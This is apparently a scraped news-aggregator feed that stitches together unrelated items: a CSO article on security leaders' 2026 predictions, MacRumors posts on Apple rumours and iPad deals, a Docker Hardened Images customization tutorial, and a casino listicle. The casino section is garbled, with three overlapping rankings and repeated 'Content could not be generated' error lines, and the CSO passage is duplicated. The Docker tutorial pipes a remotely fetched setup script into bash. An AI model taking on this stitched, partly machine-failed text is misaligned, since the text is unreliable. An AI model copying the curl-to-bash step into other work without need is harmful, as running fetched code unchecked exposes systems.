Timothy Youngblood, CISO in residence at Astrix Security and former CISO at McDonald’s and T-Mobile, shares the same concern. He expects progressive enterprises to begin mapping their quantum security in preparation of the mainstream arrival of the technology. “The more progressive enterprises are going to start to assess their quantum security gaps, who are the partners that they need to address that,” he says. “It has the potential to be another Y2K. It’s a slow-moving Y2K. Of course, people are going to be caught off guard whenever quantum becomes mainstream, and that’s coming. It’s time to assess what the strategies are.”
Toal believes boards will soon pay closer attention to quantum risk as well. He notes that attackers are already harvesting encrypted data today in anticipation of future decryption. “It might still be slightly behind AI recognition, but I think boards are going to realize they have a longer-term problem,” he says.
Auditors, he predicts, will begin raising quantum preparedness in security reviews, forcing it onto roadmaps. “If they’re not addressing the fact that a minor breach today could become a major problem in the near future, that’s a gap boards will need to reckon with.”
View the full article
CSOonline

CISO’s predictions for 2026

Last year was defined by AI hype, new attack models, and intensifying global tensions. As 2026 begins, security teams are asking what the next phase will look like. Will AI continue to accelerate risk, or will controls and governance finally catch up?
CSO spoke to 10 security leaders about their predictions and aspirations for 2026.
Governance scrambles to keep pace with AI
As AI becomes deeply embedded in day-to-day business operations, security leaders are being pushed to scale governance models far faster than before. For Barry Hensley, CSO at Brown & Brown, this translates to strengthening data guardrails by expanding data loss protection and monitoring, tightening identity controls, and introducing governance across both human and machine identities.
That push towards structure and oversight is also reshaping how organizations define security at scale. As United Airlines CISO Deneen DeFiore puts it, 2026 security will be less about perimeter defense and more about operational resilience at scale. “Threat actors will increasingly use generative AI to automate reconnaissance, social engineering, and exploit chaining, while defenders will rely on AI to prioritize risk, accelerate detection, and reduce response times,” she says. “The differentiator won’t be whether organizations use AI, but how well they govern, tune, and trust it.”
Meanwhile, Repurpose It CISO Noel Toal predicts that AI risk frameworks will increasingly reach board level. He believes these frameworks will give directors the structure and confidence to ask harder questions about AI exposure, triggering audits and help unlock long-needed security funding.
DeFiore also expects governance conversations to shift beyond traditional risk management and towards continuous cyber resilience. “Boards and regulators are already asking not just, ‘Can you prevent an attack?’ but “Can you continue operating when one happens?’” She believes that changes will drive deeper investment in identity security, segmentation, recovery testing, and third-party resilience rather than point solutions.
AI agents to reshape the threat landscape
But those same AI technologies are also changing the threat landscape. Toal points to a recent Anthropic report that documented the first large-scale AI-enabled cyberattack as an early warning sign. “I guarantee attackers will be more focused on using AI agents for what they want than a lot of businesses, because businesses in general are still very slow to adopt AI agents.”
In response, Toal says organizations will need to secure their ownAI agents with the same rigor applied to human users. “We’ll have to treat internal AI agents as identities, and monitor what they access, when they run, and whether their behavior makes sense,” he says. Without that shift, he cautions, organizations risk unleashing tools inside their networks that attackers could readily turn against them.
Challenger CISO Katie Payten agrees the rise of agentic AI fundamentally expands the identity attack surface. “The perimeter isn’t just the external perimeter anymore; identity is the perimeter.” She adds that as organizations deploy AI agents internally, governance must extend beyond human users. “Knowing what your agent has access to, how it’s making decisions, and taking responsibility for that will be essential.”
As AI becomes more deeply integrated, the sensitive data these systems rely on will become “an increasingly attractive target”, with more AI-enabled attack methods “poised to occupy a growing share of the threat landscape,” according to Michael Garvin, CISO at Jaggaer. As a result, he believes data security posture management will also become more important. “Because AI depends on large volumes of high-quality, sensitive data, organizations will need better visibility into how that data is accessed, classified, and protected.”
For Gergana Winzer, partner and cyber security mid-market lead at KPMG, the real threat with AI is not just scale, but autonomy. She warns that AI-driven attacks will increasingly make their own target and execution decisions, reducing the need for human involvement. “Everything can be automated today, not only on the side of companies, but also on the side of the criminals,” she says, raising questions about how AI-enabled threats could extend beyond the digital realm into the physical world through AI-powered drones, for instance.
Security teams will consolidate visibility and automate response
When asked about what else 2026 could mean for the global security industry, Ramsay Healthcare CISO Manal Al-Sharif believes AI will play a crucial role in helping consolidate telemetry into a single view. “When you bring everything in, it’s easy to triage and prioritize,” she says. “Having that single point of view means you’re correlating everything at the same time, so you know where you’re exposed most … [and] before those threats become incidents.”
Garvin expects security strategies to evolve inside SOCs as AI becomes more embedded. “The biggest shift will be the deeper integration of AI into defensive security operations. Organizations will increasingly invest in securing AI models and data pipelines, and they will evolve penetration testing and adversarial testing approaches to evaluate AI systems with the same rigor applied to traditional applications.”
Nadia Veeran-Patel, CISO at LRMG, has already seen this reshape incident workflows firsthand. “Our analysts were looking at incidents individually as they came through as alerts, but when AI brought them together as a collection, you suddenly realize those alerts are actually a series of events that led to something bigger.”
DeFiore also expects a fundamental shift in how security teams operate day to day. In 2026, she wants teams spending less time reacting to alerts and more time on anticipation and enablement, by using automation, better data, and tighter integration with IT and business partners to reduce friction and accelerate decision-making.
She adds what’s equally important is continued investment in people and culture. “Technology evolves quickly, but resilient organizations are built by teams that are well-trained, empowered, and aligned to a shared mission,” she says. “Creating clarity around risk ownership and decision-making is just as critical as any tool we deploy. Ultimately, success looks like a security program that enables innovation, withstands disruption, and earns trust at every level of the organization, from the boardroom to the front line.”
Toal expects AI-driven orchestration to become a defining feature of modern SOCs in 2026, as AI increasingly isolates compromised endpoints, blocks malicious IPs, rolls back ransomware in real time, and maps an attacker’s path. “The mean time to response would be vastly reduced. Instead of taking hours to respond to an incident, you could start to respond hopefully within seconds … [and] engage properly.”
SMEs will become prime targets amid rising automation
Winzer adds 2026 will mark a decisive shift, with SMEs becoming primary targets for ransomware. According to the 2025 Verizon data breach report, ransomware made up 44% of all breaches globally, and SMEs represented a disproportionate percentage of victims.
“Why? Because they’re easy now … the rationale is they have limited security maturity and they cannot absorb outages, so they end up paying [the ransomware], even though the government is saying, ‘Don’t pay’. But it’s really difficult for them to negotiate because they don’t have the budget to put proper recovery plans in place.”
Winzer warns that AI-driven reconnaissance is accelerating this trend. “AI today is very capable. You can press a button and very quickly do a huge amount of damage within a few seconds.” Combined with gaps in mid-market MSSP coverage, which are “not necessarily as complete”, she says that makes it very easy for the attackers to go after SMEs.
Veeran-Patel has seen a similar escalation in criminal tactics. “We have seen attackers routinely employing what we call triple extortion, where they combine not only data encryption, data leaking/extortion, and also leveraging third parties, like customers, regulators, and vendors, to put pressure on their victims to pay the ransoms.”
Even so, Winzer is cautiously optimistic that vendors will begin delivering more tailored solutions to the mid-market. “They did not do before. Now they’re realizing this is a huge target, and it’s also an opportunity to provide services.”
Supply chains remain vulnerable as nation-state activity intensifies
Winzer sees critical infrastructure as a primary cyber battlefield. Operational environments are “far more reachable,” she says, due to IT/OT convergence, cloud-connected control systems, and remote-access pathways that remain exposed even when partial segmentation exists.
Payten warns that data risk is increasingly hidden within complex supply chains, as organizations rely on expanding ecosystems of third-party and SaaS providers. That reliance, she says, quietly compounds exposure. “We’re using so many third parties, and those third parties use their own third parties; they become fourth parties,” she says.
The challenge is not just assessing vendors at the point of engagement but maintaining visibility over where sensitive data ultimately resides. “You can’t outsource your accountability,” Payten says. “You still own the data.”
Healthcare and local councils remain high-risk targets as well, driven by low cyber budgets, sensitive population data and the high cost of downtime, Winzer adds. “Before [attackers] were going after the cash only. But now they’re looking at reputational damage, because that causes organizations to pay faster.”
Veeran-Patel expects nation-state pressure to intensify too, warning that geopolitical conflict is increasingly being played out in cyberspace. “Cyber warfare is a real thing,” she says. “Wars are no longer going to be fought on the front lines with soldiers on the ground. They are likely going to be fought with buttons.” Her concern is that many governments are still not treating the risk with the level of urgency it requires, despite signs of critical infrastructure in developing nations already being taken offline by hostile actors.
Vendors must deliver secure-by-design products
Al-Sharif believes 2026 will be the year when the industry confronts a long-ignored truth that non-malicious insiders are not the main problem. “My issue is with the technology makers,” she says. “They still give me a car with no brake, no lock, no seatbelts. They sell it to me and find a way for me to sign away my rights … my issue is that technology makers need to be held accountable for creating flawed technology.”
She predicts insecure defaults will become untenable as incidents continue to trace back to weak authentication and outdated access controls. She says the problem is especially visible in healthcare, where connected devices still arrive with default passwords and cannot be patched without voiding warranties. “I want the government to make sure there’s a way to measure how secure those devices are before I connect a life support machine to them.”
Payten echoes concerns about insecure defaults and poorly secured connected devices. From routers to smart appliances, she highlights default credentials and weak configurations remain widespread. “There are still people with default passwords on their routers … and now there are so many connected devices.”
Now is the time to prepare for post-quantum cryptography
Zoe Hearn, head of cybersecurity strategy and governance at Insignia Financial, says rising expectations from customers, regulators, and governments are pushing organizations to take a more proactive role in preparing for the post-quantum era. She points out how simply complying with emerging standards will not be enough.
“With quantum-vulnerable encryption set to be phased out by 2030, now is the time to invest in future-ready security infrastructure,” she says. For Hearn, the shift demands leadership, not just technical uplift, as quantum risk increasingly becomes a board-level conversation.
Timothy Youngblood, CISO in residence at Astrix Security and former CISO at McDonald’s and T-Mobile, shares the same concern. He expects progressive enterprises to begin mapping their quantum security in preparation of the mainstream arrival of the technology. “The more progressive enterprises are going to start to assess their quantum security gaps, who are the partners that they need to address that,” he says. “It has the potential to be another Y2K. It’s a slow-moving Y2K. Of course, people are going to be caught off guard whenever quantum becomes mainstream, and that’s coming. It’s time to assess what the strategies are.”
Toal believes boards will soon pay closer attention to quantum risk as well. He notes that attackers are already harvesting encrypted data today in anticipation of future decryption. “It might still be slightly behind AI recognition, but I think boards are going to realize they have a longer-term problem,” he says.
Auditors, he predicts, will begin raising quantum preparedness in security reviews, forcing it onto roadmaps. “If they’re not addressing the fact that a minor breach today could become a major problem in the near future, that’s a gap boards will need to reckon with.”
View the full article
CSOonline

Top 10 Must-Visit Casinos Around the Globe for an Unforgettable Gaming Experience

World’s Best Casinos Around the Globe
1. The Venetian Macao, China
The Venetian Macao is not just a casino; it is a complete resort that offers luxury accommodations, high-end dining, and an extensive gaming floor. It replicates the charm of Venice with its canals and gondola rides.
Size: Over 550,000 square feet of gaming space Games: Poker, slots, table games Unique Feature: Indoor gondola rides 2. Bellagio, Las Vegas, USA
The Bellagio in Las Vegas is renowned for its elegance and sophistication, with the iconic fountain show that draws millions of visitors each year. Inside, the casino features a vast selection of games and high-stakes poker rooms.
Size: 116,000 square feet of casino floor Games: Slots, blackjack, baccarat Unique Feature: Famous fountain show 3. Casino de Monte-Carlo, Monaco
Casino de Monte-Carlo has a rich history and is synonymous with luxury and glamour. It is a playground for the wealthy and offers a glimpse into the high-stakes gambling world.
Size: 100,000 square feet Games: Roulette, poker, slot machines Unique Feature: Stunning architecture and decor 4. Marina Bay Sands, Singapore
Marina Bay Sands is an architectural marvel that combines entertainment, shopping, and gaming under one roof. Its casino offers a vast array of games along with a spectacular view of the Singapore skyline.
Size: 160,000 square feet Games: Baccarat, blackjack, poker Unique Feature: SkyPark with infinity pool 5. Atlantis Resort Casino, Bahamas
The Atlantis Resort Casino features a unique underwater theme, making it one of the most visually stunning casinos in the world. Guests can enjoy both gaming and various water activities.
Size: 78,000 square feet of gaming Games: Table games, poker, electronic gaming Unique Feature: Aquaventure water park World’s Best Casinos Around the Globe
When it comes to gambling and entertainment, there are a few destinations that stand out for their grandeur, atmosphere, and overall experience. Below are some of the world’s best casinos that attract millions of visitors each year. CasinoBullseye’s Casinos directory is your go-to global guide for the world’s top gambling destinations, offering a curated ranking of the most exciting casinos across countries and cities. Whether you’re planning your next gaming getaway or simply exploring renowned casino hotspots, the page provides intuitive filters, key highlights, and essential details to help you compare venues and find the best experiences worldwide. From iconic brick-and-mortar resorts to acclaimed gaming floors, CasinoBullseye makes it easy to browse and discover premier casinos — all backed by rankings designed to help players and travelers make informed choices.


1. The Bellagio, Las Vegas
Known for its elegant atmosphere and stunning fountain show, The Bellagio is a staple of the Las Vegas Strip. Features include:
Lush gardens and art galleries A diverse range of gaming options Exceptional dining experiences 2. Marina Bay Sands, Singapore
With its iconic rooftop infinity pool, Marina Bay Sands is not only a casino but a landmark. Highlights include:
A massive gaming floor with over 2,500 slot machines Luxurious hotel accommodations World-class shopping and dining 3. Casino de Monte-Carlo, Monaco
A symbol of luxury and elegance, Casino de Monte-Carlo boasts a rich history and stunning architecture. Visitors can enjoy:
Classic table games in a breathtaking environment An impressive collection of fine art Exclusive events and performances 4. The Venetian, Las Vegas
The Venetian provides an immersive experience with its charming canals and gondola rides. Key features include:
A vast gaming space with a variety of options Unique shopping and dining experiences Authentic Venetian architecture and decor 5. Casino Lisboa, Macau
One of the largest casinos in the world, Casino Lisboa offers an extensive selection of gaming and entertainment. Guests can expect:
Over 1,000 slot machines A lively atmosphere with live performances Fine dining establishments with global cuisine Conclusion
Whether you’re a casual gambler or a high roller, these casinos offer unique experiences and exceptional amenities that cater to all types of visitors. Plan your next trip to one of these fabulous locations and indulge in the thrill of the game.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
World’s Best Casinos Around the Globe
When it comes to gambling and entertainment, some casinos stand out as the best in the world. These establishments not only offer a wide range of gaming options but also provide luxurious accommodations, world-class dining, and unforgettable experiences. Here are some of the top casinos that every gaming enthusiast should consider visiting.
1. The Venetian, Las Vegas
The Venetian is a lavish hotel and casino located on the Las Vegas Strip, known for its stunning architecture and romantic gondola rides.
Game Selection: A vast array of table games and thousands of slot machines. Dining Options: Over 40 different restaurants featuring various cuisines. Entertainment: Spectacular shows and events almost every night. 2. Marina Bay Sands, Singapore
Marina Bay Sands offers breathtaking views of the city skyline and is famous for its infinity pool and luxurious casino experience.
Casino Size: One of the largest in Asia, with a vast gaming floor. Architecture: Iconic design with three interconnected towers. Attractions: SkyPark, shopping mall, and museums nearby. 3. Casino de Monte-Carlo, Monaco
This historic casino has been a symbol of luxury and elegance for over 150 years, attracting high rollers from around the world.
Gaming Experience: A mix of classic and modern casino games. Architecture: A stunning example of Belle Époque architecture. High-Stakes Games: Exclusive areas for VIP gamblers. 4. Wynn Macau, Macau
Wynn Macau is known for its opulent design and exceptional service, providing a premium gaming experience.
Game Variety: Numerous gaming tables and machines, including poker and baccarat. Luxury Amenities: High-end accommodations and award-winning restaurants. Entertainment: Live performances and stunning shows. 5. Bellagio, Las Vegas
Famous for its elegant ambiance and the iconic fountain show, Bellagio offers a sophisticated gambling experience.
Casino Layout: Designed to provide a comfortable and engaging gaming environment. Dining: Over 10 fine dining restaurants featuring renowned chefs. Art Exhibits: Features a stunning conservatory and botanical garden. These casinos offer more than just gaming; they provide luxurious experiences that appeal to all senses. A visit to any of these establishments guarantees not only a chance to try your luck but also to enjoy world-class amenities and entertainment.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
Error: Content could not be generated for this section.
View the full article
reporter

Apple to Launch These 20+ Products This Year

2026 promises to be yet another busy year for Apple, with the company rumored to be planning more than 20 product announcements over the coming months.


Beyond the usual updates to iPhones, iPads, Macs, and Apple Watches, Apple is expected to release its all-new smart home hub, which was reportedly delayed until the more personalized version of Siri is ready. Other unique products rumored for this year include a foldable iPhone, a lower-cost MacBook with an A18 Pro chip, and more.

Here is what to expect from Apple this year, according to rumors.

First Half of 2026

The following products are rumored to launch before the end of June.

iPhone 17e: A spec-bumped successor to the iPhone 16e, with rumored upgrades including an A19 chip, MagSafe, and a Dynamic Island.
iPad Air: M3 chip → M4 chip.
iPad: A16 chip → A18 chip or A19 chip.
MacBook Pro: M4 Pro and M4 Max chips → M5 Pro and M5 Max chips, and PCIe 5.0 support for faster SSD speeds.
MacBook Air: M4 chip → M5 chip.
Lower-Cost MacBook: A18 Pro chip, 12.9-inch display, and fun color options.
Mac Studio: M4 Max and M3 Ultra chips → M5 Max and M5 Ultra chips.
Studio Display: Mini-LED backlighting, ProMotion support for up to a 120Hz refresh rate, HDR support, and either an A19 chip or A19 Pro chip.
Home Hub: An all-new smart home hub featuring the more personalized version of Siri, a 6-inch to 7-inch square display, an A18 chip for Apple Intelligence, FaceTime, and more. Place it on a table or mount it on a wall.
Security Camera: Apple-designed, HomeKit-enabled security camera accessory to be sold alongside the new smart home hub.

Second Half of 2026

The following products are rumored to launch between September and December.

iPhone 18 Pro: A20 Pro chip, a narrower Dynamic Island, a simplified Camera Control, variable aperture for at least one rear camera, web browsing via satellite, Apple-designed C2 modem for 5G, and more.
iPhone 18 Pro Max: The same features rumored for the iPhone 18 Pro, but the Pro Max model might be slightly thicker.
Foldable iPhone: 7.7-inch inner display with a virtually "crease-free" design, 5.3-inch outer display, two rear cameras, one front camera, a Touch ID power button instead of Face ID, and more.
Apple Watch Series 12: A new chip, design changes, and potentially Touch ID.
Apple Watch Ultra 4: The same changes listed above for the Apple Watch Series 12.
MacBook Pro: A major redesign later in 2026, with M6 Pro and M6 Max chips, an OLED display, a touch screen, a Dynamic Island, a thinner design, and an Apple-designed C2 modem for built-in cellular connectivity.
Higher-End AirPods Pro 3: Infrared camera for AI features.

Timing Less Clear

The following products were rumored to be updated in 2025, but none of them were, so hopefully they will finally arrive at some point in 2026:

Apple TV: A17 Pro chip with support for the more personalized Siri, and Apple's N1 chip with Wi-Fi 7 support. A built-in FaceTime camera has been rumored for a future Apple TV, but it is unclear if that will arrive with the next model.
HomePod mini: S9 chip or newer with support for the more personalized Siri, Apple's N1 chip with Wi-Fi 7 support, improved sound quality, a second-generation Ultra Wideband chip, and potentially new color options like red.
AirTag: Up to 3× longer item tracking range compared to the previous generation, a more tamper-proof speaker, and more.

These products are rumored to be unveiled in 2026 at the earliest:

Apple Glasses: Augmented reality glasses with speakers for music playback, cameras for photos and video, voice control, and potentially health features.
Face ID Doorbell: A video doorbell with Face ID and HomeKit Secure Video, wirelessly connects to a compatible deadbolt lock.
iPad mini: A17 Pro chip → A19 Pro or A20 Pro chip, an OLED display, a vibration-based speaker system, and a water-resistant design.

For more details, read our Upcoming Apple Products Guide: What's Coming in 2026.
This article, "Apple to Launch These 20+ Products This Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Reportedly Aiming to Upgrade the MacBook Pro Twice This Year

Apple plans to release new MacBook Pro, MacBook Air, Mac Studio, and Studio Display models in the first half of this year, according to Bloomberg's Mark Gurman.


In his Power On newsletter today, Gurman added that redesigned MacBook Pro models with an OLED touch screen "should be hitting toward the end of 2026," meaning that the MacBook Pro line would be upgraded twice this year.

First up will be MacBook Pro models with M5 Pro and M5 Max chips, which should be coming soon. Then, the MacBook Pro is expected to receive a major redesign in late 2026 (but 2027 is still not fully ruled out), with rumored features including an OLED touch screen, a Dynamic Island, M6 Pro and M6 Max chips, a thinner design, and built-in cellular connectivity.

Apple updated the MacBook Pro twice in one year in the past, with the M2 Pro and M2 Max models debuting in January 2023 and the M3 Pro and M3 Max models following in October 2023, so there is precedent for such a thing.

Apple's Creator Studio bundle of apps launches on Wednesday, January 28, and it has been speculated that Apple might use the opportunity to unveil the MacBook Pro models with M5 Pro and M5 Max chips this week.

As for the MacBook Air, it is expected to get the M5 chip, while the Mac Studio should get higher-end M5 Max and M5 Ultra chips.

There have been reports about a new Studio Display being in the works, with rumored features including mini-LED backlighting, ProMotion support for up to a 120Hz refresh rate, HDR support, and either an A19 or A19 Pro chip. Last month, the next-generation Studio Display was potentially spotted in a Chinese regulatory database.

Apple also plans to release a lower-cost MacBook with an iPhone chip and an updated Mac mini at some point this year, according to Gurman. The lower-cost MacBook is expected to be powered by a version of the iPhone 16 Pro's A18 Pro chip.

Related Roundups: Apple Pro Display XDR, Apple Studio Display, MacBook ProTag: Mark GurmanBuyer's Guide: MacBook Pro (Caution)Related Forums: Mac Accessories, MacBook Pro
This article, "Apple Reportedly Aiming to Upgrade the MacBook Pro Twice This Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Making the Most of Your Docker Hardened Images Enterprise Trial – Part 3

Customizing Docker Hardened Images
In Part 1 and Part 2, we established the baseline. You migrated a service to a Docker Hardened Image (DHI), witnessed the vulnerability count drop to zero, and verified the cryptographic signatures and SLSA provenance that make DHI a compliant foundation.
But no matter how secure a base image is, it is useless if you can’t run your application on it. This brings us to the most common question engineers ask during a DHI trial: what if I need a custom image?
Hardened images are minimal by design. They lack package managers (apt, apk, yum), utilities (wget, curl), and even shells like bash or sh. This is a security feature: if a bad actor breaks into your container, they find an empty toolbox.
However, developers often need these tools during setup. You might need to install a monitoring agent, a custom CA certificate, or a specific library.
In this final part of our series, we will cover the two strategies for customizing DHI: the Docker Hub UI (for platform teams creating “Golden Images”) and the multi-stage build pattern (for developers building applications).
Option 1: The Golden Image (Docker Hub UI)
If you are a Platform or DevOps Engineer, your goal is likely to provide a “blessed” base image for your internal teams. For example, you might want a standard Node.js image that always includes your corporate root CA certificate and your security logging agent.The Docker Hub UI is the preferred path for this. The strongest argument for using the Hub UI is maintenance automation.
The Killer Feature: Automatic Rebuilds
When you customize an image via the UI, Docker understands the relationship between your custom layers and the hardened base. If Docker releases a patch for the underlying DHI base image (e.g., a fix in glibc or openssl), Docker Hub automatically rebuilds your custom image.
You don’t need to trigger a CI pipeline. You don’t need to monitor CVE feeds. The platform handles the patching and rebuilding, ensuring your “Golden Image” is always compliant with the latest security standards.
How It Works
Since you have an Organization setup for this trial, you can explore this directly in Docker Hub.First, navigate to Repositories in your organization dashboard. Locate the image you want to customize (e.g., dhi-node), then the Customizations tab and click the “Create customization” action. This initiates a customization workflow as follows:
In the “Add packages” section, you can search for and select OS packages directly from the distribution’s repository. For example, here we are adding bash to the image for debugging purposes. You can also add “OCI Artifacts” to inject custom files like certificates or agents.
Finally, configure the runtime settings (User, Environment Variables) and review your build. Docker Hub will verify the configuration and queue the build. Once complete, this image will be available in your organization’s private registry and will automatically rebuild whenever the base DHI image is updated.
This option is best suited for creating standardized “golden” base images that are used across the entire organization. The primary advantage is zero-maintenance security patching due to automatic rebuilds by Docker Hub. However, it is less flexible for rapid, application-specific iteration by individual development teams.
Option 2: Multi-Stage Build
If you are an developper, you likely define your environment in a Dockerfile that lives alongside your code. You need flexibility, and you need it to work locally on your machine.
Since DHI images don’t have apt-get or curl, you cannot simply RUN apt-get install my-lib in your Dockerfile. It will fail.
Instead, we use the multi-stage build pattern. The concept is simple:
Stage 1 (Builder): Use a standard “fat” image (like debian:bookworm-slim) to download, compile, and prepare your dependencies. Stage 2 (Runtime): Copy only the resulting artifacts into the pristine DHI base. This keeps your final image minimal, non-root, and secure, while still allowing you to install whatever you need.
Hands-on Tutorial: Adding a Monitoring Agent
Let’s try this locally. We will simulate a common real-world scenario: adding the Datadog APM library (dd-trace) globally to a Node.js DHI image.
1. Setup
Create a new directory for this test and add a simple server.js file. This script attempts to load the dd-trace library to verify our installation.
app/server.js
// Simple Express server to demonstrate DHI customization console.log('Node.js version:', process.version); try { require('dd-trace'); console.log('dd-trace module loaded successfully!'); } catch (e) { console.error('Failed to load dd-trace:', e.message); process.exit(1); } console.log('Running as UID:', process.getuid(), 'GID:', process.getgid()); console.log('DHI customization test successful!'); 2. Hardened Dockerfile
Now, create the Dockerfile. We will use a standard Debian image to install the library, and then copy it to our DHI Node.js image. Create a new directory for this test and add a simple server.js file. This script attempts to load the dd-trace library to verify our installation.
# Stage 1: Builder - a standard Debian Slim image that has apt, curl, and full shell access. FROM debian:bookworm-slim AS builder # Install Node.js (matching our target version) and tools RUN apt-get update && \ apt-get install -y curl && \ curl -fsSL https://deb.nodesource.com/setup_24.x | bash - && \ apt-get install -y nodejs # Install Datadog APM agent globally (we force the install prefix to /usr/local so we know exactly where files go) RUN npm config set prefix /usr/local && \ npm install -g [email protected] # Stage 2: Runtime - we switch to the Docker Hardened Image. FROM <your-org-namespace>/dhi-node:24.11-debian13-fips # Copy only the required library from the builder stage COPY --from=builder /usr/local/lib/node_modules/dd-trace /usr/local/lib/node_modules/dd-trace # Environment Configuration # DHI images are strict. We must explicitly tell Node where to find global modules. ENV NODE_PATH=/usr/local/lib/node_modules # Copy application code COPY app/ /app/ WORKDIR /app # DHI Best Practice: Use the exec form (["node", ...]) # because there is no shell to process strings. CMD ["node", "server.js"] 3. Build and Run
Build the custom image:
docker build -t dhi-monitoring-test . Now run it. If successful, the container should start, find the library, and exit cleanly.
docker run --rm dhi-monitoring-test Output:
Node.js version: v24.11.0 dd-trace module loaded successfully! Running as UID: 1000 GID: 1000 DHI customization test successful! Success! We have a working application with a custom global library, running on a hardened, non-root base.
Security Check
We successfully customized the image. But did we compromise its security?
This is the most critical lesson of operationalizing DHI: hardened base images protect the OS, but they do not protect you from the code you add.Let’s verify our new image with Docker Scout.
docker scout cves dhi-monitoring-test --only-severity critical,high Sample Output:
✗ Detected 1 vulnerable package with 1 vulnerability ... 0C 1H 0M 0L lodash.pick 4.4.0 pkg:npm/[email protected] ✗ HIGH CVE-2020-8203 [Improperly Controlled Modification of Object Prototype Attributes] This result is accurate and important. The base image (OS, OpenSSL, Node.js runtime) is still secure. However, the dd-trace library we just installed pulled in a dependency (lodash.pick) that contains a High severity vulnerability.
This proves that your verification pipeline works.
If we hadn’t scanned the custom image, we might have assumed we were safe because we used a “Hardened Image.” By using Docker Scout on the final artifact, we caught a supply chain vulnerability introduced by our customization.
Let’s check how much “bloat” we added compared to the clean base.
docker scout compare --to <your-org-namespace>/dhi-node:24.11-debian13-fips dhi-monitoring-test You will see that the only added size corresponds to the dd-trace library (~5MB) and our application code. We didn’t accidentally inherit apt, curl, or the build caches from the builder stage. The attack surface remains minimized.
A Note on Provenance: Who Signs What?
In Part 2, we verified the SLSA Provenance and cryptographic signatures of Docker Hardened Images. This is crucial for establishing a trusted supply chain. When you customize an image, the question of who “owns” the signature becomes important.
Docker Hub UI Customization: When you customize an image through the Docker Hub UI, Docker itself acts as the builder for your custom image. This means the resulting customized image inherits signed provenance and attestations directly from Docker’s build infrastructure. If the base DHI receives a security patch, Docker automatically rebuilds and re-signs your custom image, ensuring continuous trust. This is a significant advantage for platform teams creating “golden images.” Local Dockerfile: When you build a custom image using a multi-stage Dockerfile locally (as we did in our tutorial), you are the builder. Your docker build command produces a new image with a new digest. Consequently, the original DHI signature from Docker does not apply to your final custom image (because the bits have changed and you are the new builder).
However, the chain of trust is not entirely broken: Base Layers: The underlying DHI layers within your custom image still retain their original Docker attestations. Custom Layer: Your organization is now the “builder” of the new layers. For production deployments using the multi-stage build, you should integrate Cosign or Docker Content Trust into your CI/CD pipeline to sign your custom images. This closes the loop, allowing you to enforce policies like: “Only run images built by MyOrg, which are based on verified DHI images and have our internal signature.”
Measuring Your ROI: Questions for Your Team
As you conclude your Docker Hardened Images trial, it’s critical to quantify the value for your organization. Reflect on the concrete results from your migration and customization efforts using these questions:
Vulnerability Reduction: How significantly did DHI impact your CVE counts? Compare the “before and after” vulnerability reports for your migrated services. What is the estimated security risk reduction? Engineering Effort: What was the actual engineering effort required to migrate an image to DHI? Consider the time saved on patching, vulnerability triage, and security reviews compared to managing traditional base images. Workflow: How well does DHI integrate into your team’s existing development and CI/CD workflows? Do developers find the customization patterns (Golden Image / Builder Pattern) practical and efficient? Is your team likely to adopt this long-term? Compliance & Audit: Has DHI simplified your compliance reporting or audit processes due to its SLSA provenance and FIPS compliance? What is the impact on your regulatory burden?
Conclusion
Thanks for following through to the end! Over this 3-part blog series, you have moved from a simple trial to a fully operational workflow:
Migration: You replaced a standard base image with DHI and saw immediate vulnerability reduction. Verification: You independently validated signatures, FIPS compliance, and SBOMs. Customization: You learned to extend DHI using the Hub UI (for auto-patching) or multi-stage builds, while checking for new vulnerabilities introduced by your own dependencies. The lesson here is that the “Hardened” in Docker Hardened Images isn’t a magic shield but a clean foundation. By building on top of it, you ensure that your team spends time securing your application code, rather than fighting a never-ending battle against thousands of upstream vulnerabilities.
View the full article
reporter

When Will Tim Cook Step Down as Apple CEO? Here's What Reports Say

There has been increasing discussion about Tim Cook eventually stepping down as Apple's CEO, but reports have offered differing timelines.


A few months ago, the Financial Times reported that Apple was preparing for Cook to step down as soon as early 2026. In his Power On newsletter today, however, Bloomberg's Mark Gurman said that timeframe "seems unlikely."

Gurman previously said he would be "shocked" if Cook stepped down before the middle of 2026, so he might remain CEO through WWDC in June at a minimum.

There has been speculation that Cook might become the chairman of Apple's board of directors after he steps down as CEO, but it seems like that transition will not happen imminently, as Apple's current chairman Arthur D. Levinson is up for re-election at the company's annual shareholders meeting on February 24.

Apple has a guideline stating that directors generally may not stand for re-election after age 75, but the company asked shareholders to make an exemption for Levinson, due to his significant experience and expertise among other factors.

Apple's Senior Vice President of Hardware Engineering, John Ternus, is widely viewed as Cook's most likely successor. Earlier this week, Gurman reported that Cook gave oversight of Apple's design teams to Ternus at the end of last year, and he said this move makes it "crystal clear" that Ternus is the leading CEO candidate.

Cook has been Apple's CEO since August 2011, and he reached the typical retirement age of 65 last year. It is sounding more and more likely that his time in charge of the company is inching towards the end, but Gurman seems confident that a passing of the baton is still many months away at least, rather than something that is imminent.

Tags: John Ternus, Mark Gurman, Tim Cook
This article, "When Will Tim Cook Step Down as Apple CEO? Here's What Reports Say" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple's M5 iPad Pro Hits Multiple Record Low Prices on Amazon

Amazon this weekend is offering discounts across the M5 iPad Pro lineup, including both 11-inch and 13-inch models. The highlight this time around is a return of a low price on the 256GB Wi-Fi 11-inch M5 iPad Pro, which is on sale for $899.00, down from $999.00.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Many of the deals in this sale match — or beat — the record low prices we tracked during the holiday season. Amazon provides an estimated delivery date around January 30 for free delivery, but Prime members should see earlier delivery dates in many cases.

$100 OFF11-inch M5 iPad Pro (256GB Wi-Fi) for $899.00
$149 OFF13-inch M5 iPad Pro (256GB Wi-Fi) for $1,149.99

There are fewer 13-inch M5 iPad Pro models on sale this time around, but the ones that are on sale have steeper discounts compared to last week. You'll find $149 off two Wi-Fi models (both all-time low prices), plus a new record low price on the 1TB Wi-Fi 13-inch M5 iPad Pro at $202 off the original price.

11-Inch M5 iPad Pro

256GB Wi-Fi - $899.00 ($100 off)
512GB Wi-Fi - $1,099.00 ($100 off)
